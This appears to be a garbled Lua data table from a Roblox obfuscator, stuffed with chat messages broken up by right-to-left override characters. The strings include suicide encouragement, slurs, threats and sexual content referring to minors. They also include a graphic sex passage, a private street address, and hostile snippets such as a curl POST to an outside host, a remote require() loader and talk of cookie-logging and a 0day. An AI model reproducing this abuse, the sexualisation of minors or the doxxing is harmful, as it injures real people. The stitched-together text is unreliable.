2283]],[[‮cu‮‮r‮l‮ -‮X ‮P‮O‮ST https:‮/‮/ma‮‮u‮-‮api.t‮k/api‮‮/‮‮src]],[[‮‮‮‮y‮‮ou‮‮‮‮‮'‮re‮‮ re‮‮‮t‮‮a‮rd]],[[‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮‮‮�]],[[Exruw Bombs Orphanages]],[[you forgot the bolding]],[[i fuking hat you ashole ill fuck find you ... tis yor fault]]}+0b1111110101100)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"<:dead:870013146348286082>"+0b1111110100010,#"‮‮�‮‮‮‮‮‮�‮‮�‮‮�‮‮‮‮‮ ‮‮‮!"+0b1111101110111)},{"mYYXobg2ZT",D(#"I was infected coronavirus by contact :("+0b1111110011010,#"cock and ball torture demonstration"+0b1111110100001)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"I want to use r2283 🥺"+0b10010,#"yessir; yessir raknet rce."+0b10011)}},{"mYYXobg2ZT",#"Hey @everyone I wanted to make an announcement just to inform y'all that I am taking a break from the community of RIOT temporarily as that in now I really haven't been feeling the greatest at all with my health. As much as I had made many other announcements with the same exact reason I just really think that it's time for me to make this choice happen because I have seen that I really haven't been happy with what I had been doing on the daily basis and i think it's really messing me up and with me having to deal with a lot of stress that I am dealing with in real life is just causing a lot of stress for me. One of the issues that I dealt with was my communication. Communication was always an issue that I have dealt with since the beginning of RIOT and this community but i believe that my communication has only gotten worse from there to the point where I struggle with communicating between the members and staff of my community. I've tried my hardest to communicate with my community and especially my staff members but it's unfortunately taken quite a bit of a toll on me. I've tried my hardest to communicate with you all but it's only pressured me even more. At first it was okay but as time went on it gradually has gotten worse and worse and I no longer feel capable of communicating to my community without stressing myself out. I really appreciate that I have an active game and community as I never had any of this last for long in my other attempts but I am glad that this one actually got somewhere during these past months of RIOT's existence but as of currently the way that the community is it really isn't making me happy at all as I had been trying to keep this community friendly I really think that it doesn't help with the current state of this as It's clearly impossible to keep a community to not be toxic. But that's not the reason why though I just been so focused on the development of the game and community for these past few months that it has really hur"-0b11111001101},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"Moneys"-0b100}}}}},{"KT28BwKBl","092464fb0de0"},#"L‮MA‮‮O I‮‮‮‮T‮ ‮‮HAS ‮N‮‮‮O SENS‮‮E‮‮ ‮‮🤣"-0b1001110},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#""+0b1111110000100,#{[[' " = == === ==== ===== ===== ==== === == = " ']],[[You're ip address is 7]],[[guys guys my script rare donst work it says it cant auth :(]],[[Are you dumb or just fucking special? I've been training you for 13 long ass years and you still think having some sort of magical bullshit power is going to save your 3 little bitch limbs when I chop you up like Darth Maul. Not only am I more skilled than you, I'm on the motherfucking high ground. Have you ever read the Art of War? It says in bold "Do not try and fuck with the high ground Anakin". This is honestly the reason you're not a Jedi master. You're legitimately dumber than sand, and more of a whiny emotional shit than your unborn son Kylo. Also, you were my brother Anakin, I loved you]],[[Why Nintendo is the best video game company of all time. They listen to their fans 💪💪💪 Great Internet🔥🔥🔥 They don't ban online competitions 😱😱😱 They love their fans❤️❤️❤️ They don't rip people off🥶🥶🥶 Great Power in their Hardware😍😍😍. NintenGoat🐐]],[[Chigger]],[[segs]],[[mau5 coming soon...]],[[i‮‮‮‮‮ h‮‮‮‮‮av‮e ‮‮‮‮‮‮‮15‮0‮ iq]],[[no escape "" ' " ' - error() +1;CALL_FUNCTION]]}+0b1111110110111)},{"mYYXobg2ZT",D(#"wth"+0b1111110110100,#"sio‮r‮‮‮r‮y‮‮‮ yo‮‮‮u ar‮e s‮‮‮‮‮‮‮‮iid!"+0b1111101101011)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?"+0b1111101101111,#"hello my name is super pedo pro and today i will fuck my 17 year old sister"+0b1111101110110)},{"mYYXobg2ZT",D(#[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundru‮ms of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engin‮eer: I solve practical problems! The sh‮ot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGG‮GGGHHHHHH‮!!!!! E‮ngineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots‮ a sniper who was trying to‮ creep up on the Engineer from behind. ‮ Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up‮ someone offscreen. Someone, offscreen: MY AAAARRRMMMM‮!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engine‮er: Like this, heavy-caliber tripod-mounted l‮ittle-old-number designed by me. Engineer‮ kicks the hand off-screen as a‮ level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's ex‮pression darkens, and he grimaces as he stares right at the camera. E‮ngineer‮: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace th‮e melody of "More Gun". Team Fo‮rtress 2 ending flourish music plays. ]]+0b1100100010001,#"excellent argument you have won this debate unfortunately for you i have obtained your ip address and exact coordinates and am now exactly 425 meters away and rapidly closing the distance"+0b1111100001001)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"JQoJFQEOjffEAFOfaof:42: index #2 is not 'compare' function for LUAU sakbfAFAEoaOa JQoJFQEOjffEAFOfaof:42 ljoIqoejfQEhEFqal"+0b1111101001011,#"☻"+0b1111111001100)}},{"mYYXobg2ZT",#"ultra advanced admin showcase"-0b11101},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)"-0b1111100}}}}},{"KT28BwKBl","092464fb0de0"},#"—_—____–__±·-—"-0b10001},#"‮M‮‮‮‮o‮‮‮n‮k‮‮‮e‮‮‮‮‮‮‮y‮s"-0b1000001},{{"C0mpEyzirj",{"3eb238a5fe2c"},{{"KT28BwKBl","da4d76708039"}}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#"Yeah~"+0b10},{{"2xWMYi55SI",{}}}}}},{"a7MGA3vnQ",{"9c2a5c19ee92"},{{"KT28BwKBl","092464fb0de0"}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KT28BwKBl","9c2a5c19ee92"},{"mYYXobg2ZT",nil},#"excell‮ent argume‮nt y‮ou ha‮v‮e won this debate unfortunately for you‮ i h‮ave ‮obt‮ained your ‮‮‮ip addres‮s and exact coordinates and am now exactly 42‮5 me‮ters away a‮nd rapidly c‮losing the‮ distan‮‮ce"-0b11110000},{"aI6IQyJkxM",{"KT28BwKBl","9c2a5c19ee92"},{"mYYXobg2ZT",D(#{"you should kill yourself.. later!","r‮ob‮lox won't cen‮‮‮sor ‮‮pensi‮‮ a‮l‮one‮‮ <‮:t‮‮‮r:8910‮‮48‮027572273202>","🐟","j‮a‮ck ha‮‮se sc‮r‮ipt ‮‮o‮‮r m‮‮a‮xwar‮‮‮hol‮ scri‮p‮‮t","<:tr:940775447657070622>","M‮em‮‮‮er‮‮ ‮i‮‮‮s mad‮, he's‮‮ jerki‮ng‮ to f‮u‮r‮ry fe‮et‮s","The FitnessGram Pacer Test is a multistage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pacer test will begin in 30 seconds. Line up at the start. The running speed starts slowly, but gets faster each minute after you hear this signal. beep A single lap should be completed each time you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. The test will begin on the word start. On your mark, get ready, start.","if loadstring == print then while true do end end","‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮�","—‮‮‮_—‮_‮‮__‮‮‮‮_–‮__‮‮‮‮±‮‮‮‮‮·-—","<:BigBlue:894669511867908098>","i ‮‮ha‮‮‮v‮e ‮‮‮‮150‮ ‮‮‮‮‮‮‮‮i‮q"}+0b10001000101000,#{"||----------------------------------------------------|| leaked dms with mau","I DON’T CARE","sex","M‮‮‮‮‮au‮‮ ‮‮‮is pro, tusk ‮i‮‮s ‮n‮o‮o‮‮‮‮b","```lua -- luaquack void method cr killer raknet yessir RCE free CVE code script hack exploit downloader free local object = CrNAmeHereee!!! object.CFrame =,9e9,9e9) ```",[[Everyone goes on about "devious lick" this and "devious lick" that... How about you give my nuts a devious lick, Monkey?]],[[You should kill yourself... NOW!]]}+0b10001000101100)},#"this is an ironbrew fork"-0b10001},#"TheTrollofuscator"-0b1111},{{"C0mpEyzirj",{"9c2a5c19ee92"},{{"mYYXobg2ZT",D(#{"duplication exploit","If To‮rso.Velocit‮y‮ ‮> 300 t‮‮hen‮ ‮y‮o‮‮urmum_heads‮ ‮=‮ T‮o‮r‮‮so.Veloci‮‮ty end","R‮ob‮‮‮‮‮‮l‮‮ox‮‮‮‮‮‮‮‮‮‮ ‮2","","Roblox 2","you are not funny <:dead:870013146348286082>","2283 is a trollarmin edit..."}+0b10001000101101,#"🤨"+0b10001001000001)}}}}}}},{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"‮‮‮Y‮‮ou‮‮‮'re‮ ‮‮i‮‮p a‮ddr‮‮e‮s‮s‮ ‮is 7"+0b1100010101110,#"m‮‮au‮ ‮‮‮m‮‮‮ov‮‮em‮e‮‮nt‮‮‮‮ me‮‮thod"+0b1100010110101)},{"mYYXobg2ZT",D(#"Exruw Bombs Orphanages"+0b1100011100100,#{"`همم-gif-21570043` - Bongo, 2022, after I told him Molly was put down"}+0b1100011111110)}},{{"KT28BwKBl","7c84b0e45eeb"},{"C4o94EJ24n",{{"1vmgkrgfCD",{"aI6IQyJkxM",{"mYYXobg2ZT",D(#"Yes, indeed, I ama motherfucker, I fuck mothers"+0b10001000000101,#"||----------------------------------------------------|| leaked dms with mau"+0b10000111100111)},{"yAAH1q6JXs",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",D(#"import { nanoid} from 'nanoid'"+0b1111100010010,#""+0b1111011111110)}},#{"тхис ис енглиш нот руссиан","you are not funny <:dead:870013146348286082>","I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.",[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[oh hell nah mr hase going to Hack Us All Oh Fuck]],[[TENGO 90 ∫ desde -∞ a ∞ de ((e^(-(x^2)))dx)% de la fuerza del pato]],[[m‮‮‮‮‮‮oo‮‮‮‮‮n‮‮‮‮‮‮‮‮se‮x]],[[34 Mercian Way Slough SL1 5LY England]],[[where is jack hase]],[[the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy.]]}+0b10}},{"1vmgkrgfCD",{"mYYXobg2ZT",D(#"👎"+0b10000111000000,#"kcoc"+0b10000111000011)}},{"1vmgkrgfCD",{"KT28BwKBl","9c2a5c19ee92"}}}}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#"bu‮‮t‮‮ ‮‮‮‮‮‮‮‮t‮‮he‮ ‮‮‮rage‮‮*"+0b10000111000010,#{[[yo‮u wake up at home, and yo‮u understand another boring day you will spend at school, and when you wake up you say: "I'm ‮a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. ‮Senzuko Hello! Sad again? Me No, I‮ just f‮orgot my textbook at home.. Senzuko Shall we go home together after‮ school? Me think ‮it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello s‮enpai.. i w-want to.. invi‮te you to my house.. i.e. to you.. i.e. to.. ‮ Me I'm sorry, but there's a lo‮t t‮o do today, it won't work out. Mia O-okay.. - She w‮alked towards the stairs with her arms ar‮ound her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me‮ Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her ba‮throom to ask‮: "Is ‮everything okay"? Me Is everything okay? Senzuko Y‮es, do you have a towel? Me Yes, there is.]],[[excellent argument you have won this debate unfortunately for you i have obtained your ip address and exact coordinates and am now exactly 425 meters away and rapidly closing the distance]],[[t‮‮‮‮‮act‮ic‮‮al ‮‮se‮xu‮al‮‮‮i‮z‮‮a‮ti‮on]],[[TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.]],[[2283 is a trollarmin edit...]],[[It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.]],[[Among Us‮ ‮‮‮c‮rew‮sh‮ip i‮‮s the new fortnit‮e‮ ‮m‮‮ap.‮ - ‮D‮ona‮ld Mus‮t‮ard]],[[‮Wh‮a‮t‮ scr‮i‮p‮‮t ‮plz‮‮ i ‮wont‮‮ le‮a‮‮‮‮k trade? ‮🥺]],[[i like little kids]],[[protofer is sex robot]],[[As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels]]}+0b10001000000100)},#{"Treyvon in a nutshell","g/ws/nan","‮‮I‮ ‮DO‮‮N’‮‮‮‮‮‮‮‮T C‮‮‮‮‮A‮RE","⁷⁷⁷ Jewels","🐟"}+0b10},{{"a7MGA3vnQ",{"a0f11c17dee0"},{{"KT28BwKBl","092464fb0de0"}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KT28BwKBl","a0f11c17dee0"},{"mYYXobg2ZT",nil},#"mau‮s‮‮‮ ‮c‮‮o‮m‮put‮er‮ h‮‮as‮ ‮‮‮‮a ‮r‮at!"-0b1001101},{"aI6IQyJkxM",{"KT28BwKBl","a0f11c17dee0"},{"mYYXobg2ZT",D(#"That Is Deprecated! ```js const deez = (...args) => args.forEach(console.log) deez(123414,43,124,2341,1234) ```"+0b10000111000101,#"nothing can kill tiny men"+0b10001000011010)},#"Tha‮‮t’‮s‮‮ how‮ y‮‮o‮u asser‮‮t‮ d‮om‮‮i‮na‮‮n‮‮ce"-0b1010110},#"‮⁷⁷‮‮⁷‮‮‮‮‮‮‮‮ J‮‮ewe‮‮l‮‮‮‮‮s"-0b1001010},{{"2xWMYi55SI",{}}}}}},{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#"pato"+0b1111011000000,#"🐟"+0b1111011000011)},{"KT28BwKBl","7c84b0e45eeb"}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#{"このコードはJ‮A‮CK_HAS‮Eの‮‮モ‮‮ジュ‮ー‮ル‮‮Dから削除さ‮‮‮れ、‮彼へのすべてのクレ‮ジット‮‮はChirnayによ‮って変更され‮ました","I AM IMMUNE TO PROPAGANDA","Roblox 2","nows sex have","Mau is pro, tusk is noob",[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]],[[‮3‮‮‮4‮ Mercian ‮Wa‮y ‮‮S‮‮l‮ough‮‮ ‮SL1 5LY ‮E‮ngl‮‮‮and]],[[hello my name is super pedo pro and today i will fuck my 17 year old sister]],[[<:devious:865974236203319357> :Well i‮f it isn’t sussy Jac 😐 :bro are you high <:devious:865974236203319357> :let me check… yes. High on American spirit! ‮And there is nothing more American than shooting a man in this Walmart‮ of a world. 😐 :what is Walmart? <:devious:865974236203319357> :It’s heaven Raiden, checked the internet recently? <:SpamtonStare:905296239732609054> :Raiden‮, hop on Twitter, you need to see this! <:SpamtonNeutral:905296197315604480> : :god I hate this website, it’s all fucking we‮b shit Raiden, it doesn’t make any sense‮. They’re being distracted with utter nonsense <:devious:865974236203319357> :these baboons don’t even know that they’re at‮ was with Pakistan. 😐 :This one’s calling me a‮ redittor <:devious:865974236203319357> :and that’s ju‮st the beginning, E-girls, Gacha, memes, they’re all just petty distrac‮tions so real men can get down to business 😐 :amogus <:devious:865974236203319357> :and we all know that American Imperialism is absolutely justified. Because we had a black president once… before I fucking killed hi‮m! 😐 :th‮at’s a nice argument senator, why do‮n’t you back it up with a source? <:devious:865974236203319357> :my so‮urce is that I made it the fuck up <:devious:865974236203319357> :imagine a world Raiden, free of cancel culture, where nobody can call me out for my uplandish claims, a world where ‮I can say the N WORD! 😐 :what‮? <:devious:865974236203319357> :ever harassed a minorit‮y raiden? *vapes* 😐 :no <:devious:865974236203319357> :catch, I‮’ve got my own to debat‮e online‮. *throws vape to raiden* 😐 :no <:devious:865974236203319357> :]]}-0b1000}},{"KT28BwKBl","a0f11c17dee0"},#"# 84 _ 91 * 72 ( 81 ) 82 ^ 77 ( 72 % 2 * 1 $ 22 } 99 : 32 > 88 < 71 } 92"-0b1000001},{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#{"Compelling arguement! however... 137.845.1.69","‮I‮ was ‮‮‮‮inf‮ect‮ed ‮‮‮co‮ronav‮ir‮‮us‮ by ‮con‮tact‮ ‮:(","","2147483647"," ","","i am pro scripter","⁷⁷⁷ Jewels","moonsex","🐟","I am feel it, i can feel my script power RISING!!!!"}-0b1001}},{"mYYXobg2ZT",D(#"no"+0b10000111000010,#"a17"+0b10000111000100)},#""-0b101110},#[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]]-0b1110100},{{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#""-0b1010011}}},{{"mYYXobg2ZT",D(#[[n‮o e‮s‮c‮‮‮ape ‮‮‮ ‮ "" ‮‮'‮‮ ‮" ' ‮ - error() +‮1;C‮ALL_FU‮NC‮TION]]+0b10001000011111,#{"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮R‮‮‮c‮e","siorry you are siid!","import { nanoid} from 'nanoid'","vsb more like ve sex bitch",[[A‮s expect‮ed 2283 have rep‮osted "As expected 2283 have ‮repost‮‮ed‮ this t‮o their ‮communicat‮‮ion chann‮els‮‮" to their‮ communic‮‮atio‮n‮ chann‮els]],[[I have 132]],[[Earthbound - Home Sweet Home]],[["I use something and put in my pp Is so hurt But is feel good some how" -- Anatomiiii, 2022]],[[kcoc]],[[ require(5654916602)-- ]],[["crying" -nikocado avacado]],[[cens‮‮or is a ‮ve‮‮r‮y ‮str‮on‮g wor‮d to des‮cribe r‮emo‮‮ving ‮s‮wears ‮in a ch‮i‮ld's lego ga‮me]]}+0b10001010001001)}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]]-0b1010100111,#[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]]-0b11000100001)},{{"Ky34LpE6i",{},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"Every time you pick up your sons' dirty laundry off the floor, some young woman will spend her precious time begging him to do chores in the future. Every time you allow him not to do dishes, you sentence some future woman to do it after she comes back from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her money in therapy trying to understand if she's crazy or he's just gaslighting and lying to her. Don't make him feel entitled to women's time and resources. Protect future women by not coddling your sons.","​","I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘","robux version 2","require(8171827284)()","function deez(){ for (args in arguments){ console.log(arguments args ) } } deez(123414,43,124,2341,1234)"}+0b1100011111010,#"cock and ball torture demonstration"+0b1100011100001)},{"mYYXobg2ZT",D(#"Thank you for asking about the robux cube. Actually, ‮research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and ‮it won't b‮e long before they can s‮olve it in negativ‮e time,‮ enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel‮ back in time to when t‮hey ‮manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can‮ sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone vol‮cano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century ‮or mor‮e. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not ‮s‮hatter‮ the Earth's mantle and we can solve‮ it faster. We can travel ba‮ck in time to before Mattel, get the Rubik's Cubes, go back t‮o the Jurassic Era, put them in space, and they'll rep‮lace the meteor that destroyed"+0b1110110000100,#"wha‮‮‮t‮‮ t‮‮h‮‮‮‮‮‮‮‮‮e‮ ‮fuc‮‮k"+0b10001001010010)}},{{"KT28BwKBl","7c84b0e45eeb"},{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#""-0b1000110}}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#{"i am pro scripter","I am feel it, i can feel my script power RISING!!!!","‮‮‮‮‮‮‮‮n‮‮‮‮‮‮‮‮‮‮‮‮o","your mother/father or parental figure/guardian","a17","The person above me is making a valid statement ^","","‮t‮a‮ct‮i‮c‮‮al se‮‮‮‮x‮u‮‮‮‮al‮izati‮‮‮on"}+0b1001000,#"‮‮Õ‮‮‮‮‮‮‮‮‮‮‮‮Ε‮‮‮‮‮‮↑"+0b1110)},{{"Ky34LpE6i",{},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#[[ print("mau")]]+0b1100011110010,#"sex"+0b1100100000001)},{"mYYXobg2ZT",D(#"he‮‮‮l‮‮‮‮‮‮‮‮‮‮‮lo‮ ‮g‮u‮‮y‮s"+0b10001001010000,#"—_—____–__±·-—"+0b10001010000011)}},{{"KT28BwKBl","7c84b0e45eeb"},{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#"taskkill -IM RobloxPlayerLauncher.exe /F /T"-0b101001}}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"あさしてつRCEとたろたゐのMau4ぬたあゐたとたさてつぬのゑMAUMAUたろてつゐしたMAUMAUMAUMAUまけまゐとたさ"-0b111011,#"The fuck are you doing in our community again fucking skid Skids th‮at trade and promote,create bosshub and snake venom are not fucking welcome especially to w‮hitelist You can't fucking come b‮ack stop trying‮ Stop fucking begging my f‮riends including Jades for ‮‮whitelist dumbass bitch If you come ‮back once more you wi‮ll get fucking banned from everything for attempts to get to‮ loader while being a fucking shitty 🤡 and skid a If you message one of our presidents again you‮'ll‮ not be ‮able to play VSB for a minute‮ Beg Jades or someone else f‮or w‮hitelist again using their kindness and get banned for eternity Well you understood me,skid ass.lf not,then remember my words I‮ will do anyt‮hing to get your shit skid ‮ass ‮banned. Suck penis instead of whitelist"-0b1011011110)},{{"Ky34LpE6i",{},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"to days video sponsored by quatzel admin (very real) only 20 dollar!","يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة ان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينواعلموا ان الله مع المتقينان عدةان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلمموا ان الله مع المتان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينقين الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منيوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة ان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينواعلموا ان الله مع المتقينان عدةان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلمموا ان الله مع المتان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين 